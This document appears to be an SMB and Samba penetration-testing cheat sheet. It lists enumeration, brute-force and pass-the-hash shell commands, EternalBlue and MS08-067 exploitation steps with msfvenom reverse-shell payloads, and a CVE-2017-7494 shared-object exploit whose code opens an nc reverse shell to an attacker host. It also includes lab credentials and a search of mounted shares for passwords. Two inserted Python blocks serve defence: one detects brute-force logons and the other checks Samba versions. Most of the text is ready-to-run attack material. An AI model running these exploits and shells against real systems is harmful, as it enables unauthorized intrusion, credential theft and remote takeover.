Version if nmap didn't detect it
Sometimes nmap doesn't show the Samba version running on the remote host. If this happens, a good way to find out is to capture traffic with wireshark against the remote host on ports 445/139 while running smbclient -L in parallel; do a "Follow TCP Stream" on the capture and the version string the server sends back should be visible.
OR
sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L <IP>
Scan for vulnerability
nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1 <IP>
If :
Manual testing
smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '' -p '' -H <IP> -R
crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '' -p '' --shares
enum4linux -a <IP>
smbclient --no-pass -L //$IP
smbclient //<IP>/<SHARE>
# Download all files from a directory recursively
smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *"
Brute force
crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV
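The crackmapexec and hydra runs above leave a distinctive trail on the server side: many failed logons from one source in a short span, often across several usernames. The following is an added defender-side example, not part of the original cheat sheet, that flags such a source; it runs over constructed log lines loosely shaped like Samba's auth-audit output (the exact line format is an assumption; adapt LINE_RE to your real log source).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines, loosely shaped like Samba's "Auth:" audit output.
# The exact layout is an assumption; adapt LINE_RE to the real log source.
SAMPLE_LOG = r"""
2024-03-01T10:00:01 Auth: user [WG]\[alice] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.5:49152]
2024-03-01T10:00:02 Auth: user [WG]\[bob] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.5:49153]
2024-03-01T10:00:03 Auth: user [WG]\[guest] status [NT_STATUS_NO_SUCH_USER] remote host [ipv4:10.0.0.5:49154]
2024-03-01T10:00:04 Auth: user [WG]\[admin] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.5:49155]
2024-03-01T10:00:05 Auth: user [WG]\[alice] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.5:49156]
2024-03-01T10:00:06 Auth: user [WG]\[alice] status [NT_STATUS_OK] remote host [ipv4:10.0.0.5:49157]
2024-03-01T10:30:00 Auth: user [WG]\[carol] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.7:51000]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) Auth: user \[[^\]]*\]\\\[(?P<user>[^\]]*)\] "
    r"status \[(?P<status>NT_STATUS_\w+)\] remote host \[ipv4:(?P<ip>[\d.]+):\d+\]"
)

def detect_smb_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: {"failures": n, "users": [...]}} for every source that
    produced `threshold` or more failed SMB logons inside one `window`."""
    failures = defaultdict(list)            # ip -> [(timestamp, username)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["status"] == "NT_STATUS_OK":
            continue                        # unparsable line or successful logon
        failures[m["ip"]].append((datetime.fromisoformat(m["ts"]), m["user"]))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0                           # sliding window over the sorted events
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {"failures": len(events),
                              "users": sorted({user for _, user in events})}
                break
    return alerts

if __name__ == "__main__":
    for ip, info in detect_smb_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failed logons, users tried: {info['users']}")
```

A single source trying several distinct usernames (the "users" list) is the password-spray pattern; a long list of failures against one user is the classic dictionary attack.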
Mount an SMB share
mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>' //<IP>/<SHARE> /tmp/share
smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER>
Get a shell
psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP> <COMMAND>
atexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
EternalBlue (MS17-010)
https://github.com/3ndG4me/AutoBlue-MS17-010
Check if vulnerable
python eternal_checker.py <IP>
Prepare shellcodes and listeners
cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh
Exploit
python eternalblue_exploit<NUMBER>.py <IP> shellcode/sc_all.bin
It may need to be run multiple times.
If this doesn't work, try this one:
python zzz_exploit.py <IP>
MS08-067
# Download exploit code
git clone https://github.com/andyacer/ms08_067.git
# Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# Modify
Modify ms08_067_2018.py and replace the shellcode variable with the one generated by msfvenom.
# Listener
nc -lvp <PORT>
# Exploit
python ms08_067_2018.py <IP> <NUMBER> 445
CVE-2017-7494
# Download exploit code
git clone https://github.com/joxeankoret/CVE-2017-7494
Create a new file named poc.c:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */
/* Samba loads the shared object and calls this entry point */
int samba_init_module(void)
{
setresuid(0,0,0);
system("ping -c 3 <IP>");
return 0;
}
# Build
gcc -o test.so -shared poc.c -fPIC
# Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp
# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so
If you receive 3 pings on your listener then the exploit works. Now let's get a shell:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */
int samba_init_module(void)
{
setresuid(0,0,0);
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
return 0;
}
# Build
gcc -o test.so -shared poc.c -fPIC
# Start a listener
nc -lvp <PORT>
# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so
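The version banner that the wireshark/ngrep capture at the top of this page is hunting for is also what decides whether a host is in the CVE-2017-7494 affected range, so the two checks belong together. The following is an added defender-side example, not code from the original page or from the exploit repository: it pulls the "Samba x.y.z" string out of a captured SMB byte stream (ASCII or UTF-16LE), compares it with the releases the Samba advisory fixed (4.6.4, 4.5.10, 4.4.14; everything from 3.5.0 up to those is affected), and checks smb.conf for the advisory's workaround, nt pipe support = no. The sample bytes and all function names are constructed for the example.

```python
import re

# Constructed sample of what "Follow TCP Stream" shows: the server's Native OS /
# Native LanMan fields, once in ASCII form and once in UTF-16LE (NULs interleaved).
SAMPLE_ASCII = b"\x00\x00Unix\x00Samba 4.5.9\x00WORKGROUP\x00"
SAMPLE_UTF16 = "Unix\0Samba 4.6.4\0WORKGROUP\0".encode("utf-16-le")

# "Samba x.y.z", tolerating one NUL between characters, which is what the ngrep
# pattern s.?a.?m.?b.?a on this page also does for the UTF-16LE case.
BANNER_RE = re.compile(
    rb"[Ss]\x00?a\x00?m\x00?b\x00?a\x00?[ \x00]+((?:\d\x00?)+)\.\x00?((?:\d\x00?)+)\.\x00?((?:\d\x00?)+)"
)

# Per the Samba advisory for CVE-2017-7494: 3.5.0 onwards is affected; fixed in
# 4.6.4, 4.5.10 and 4.4.14, and every later branch (4.7+) shipped with the fix.
FIRST_AFFECTED = (3, 5, 0)
FIXED_IN = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}

def extract_samba_version(stream):
    """Return (major, minor, patch) from captured SMB bytes, or None if no banner."""
    m = BANNER_RE.search(stream)
    if not m:
        return None
    return tuple(int(g.replace(b"\x00", b"")) for g in m.groups())

def is_vulnerable_cve_2017_7494(version):
    """True when the version tuple falls inside the affected range."""
    if version is None or version < FIRST_AFFECTED:
        return False
    branch = version[:2]
    if branch in FIXED_IN:
        return version < FIXED_IN[branch]
    return branch < (4, 7)      # older branches never got a fix; 4.7+ is fixed

def smb_conf_has_workaround(smb_conf):
    """The advisory's workaround: 'nt pipe support = no' in the [global] section."""
    for line in smb_conf.splitlines():
        key, _, value = line.partition("=")
        if key.strip().lower() == "nt pipe support" and value.strip().lower() in ("no", "false", "0"):
            return True
    return False
```

Feed extract_samba_version() the raw bytes of the followed TCP stream; a None result means the server did not send a Samba banner at all, which is itself worth noting (Windows hosts, or a hardened Samba that hides its version).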
nmap
root@kali:~# nmap -v -p 139,445 --script smb-vuln-* 192.168.56.101
nbtscan
root@kali:~# nbtscan -r 192.168.11.0/24
enum4linux
root@kali:~# enum4linux -a 192.168.56.101
smbmap
smbmap -H 10.10.10.161
ADMIN$
C$
Data
smbmap -H 10.10.10.16 -R DATA   # recursive search
smbmap -H 10.10.10.16 -R DATA --download 'Data\\Search\\archivo.txt'
with credentials
smbmap -u Tempuser -p Welcome123 -H 10.10.10.16 -R DATA
enumerating with domain credentials
smbmap -d active.htb -u SVC_TGS -p GPPsaras2012 -H 10.10.10.100
smbclient
smbclient \\\\$ip\\$share -I target -N
smbclient -N -L 192.168.168.168   # lists the SMB server type (often including the Samba version) and the available shares
recursive download with smbclient
smbclient \\\\secnotes.htb\\new-site -U anonymous
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
rpcclient
rpcclient -U "" target
Mount shares
mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs
mount shares 2
sudo apt-get install cifs-utils
mkdir /mnt/Replication
mount -t cifs //10.10.10.100/Replication /mnt/Replication -o username=<username>,password=<password>,domain=active.htb
grep -R password /mnt/Replication/
nmblookup
nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries
acccheck
acccheck -v -t <IP> -u <USER> -P /usr/share/dirb/wordlists/common.txt   # tries each password in the list by connecting to the IPC$ and ADMIN$ shares
shell when we have the credentials
root@kali:# psexec.py secnotes/administrator:@secnotes.htb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
shell 2 when I have credentials
winexe -U Administrator //10.0.0.0 "cmd.exe"
If SMB is up locally but the port is closed externally, then try a remote port forward back to your attacking machine:
plink.exe -l sshproxy -pw sshproxy -R 445:127.0.0.1:445 10.10.10.10
winexe -U Administrator //127.0.0.1 "cmd.exe"